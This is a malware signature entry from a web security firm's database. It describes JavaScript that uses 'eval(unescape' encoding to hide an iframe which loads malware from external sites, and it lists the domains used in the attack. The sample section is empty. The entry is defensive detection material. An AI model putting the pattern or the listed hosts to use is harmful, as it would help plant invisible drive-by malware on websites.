Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: MW:IFRAME:HD28

Description: Javascript encoding used to hide a malicious iframe.

Sites used in this attack:
http://bodisparking.com/
http://astped.com/
http://bedfer.com/
http://cerpoo.com/
http://jikped.com/
http://jorped.com/
http://kevfer.com/
http://naurup.com/
http://pempoo.com/
http://podfer.com/
http://quaped.com/
http://qutped.com/
http://saspoo.com/
http://sedpoo.com/
http://tivped.com/
http://verfer.com/
http://xedfer.com/
http://xetpoo.com (and many others)

This is used to load malware from external web sites while not being visible to the user.

Affecting: Any web site (no specific target)

Details: Usually starts with a "eval(unescape" followed by a large chunck of encoding text.

Malware sample:

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb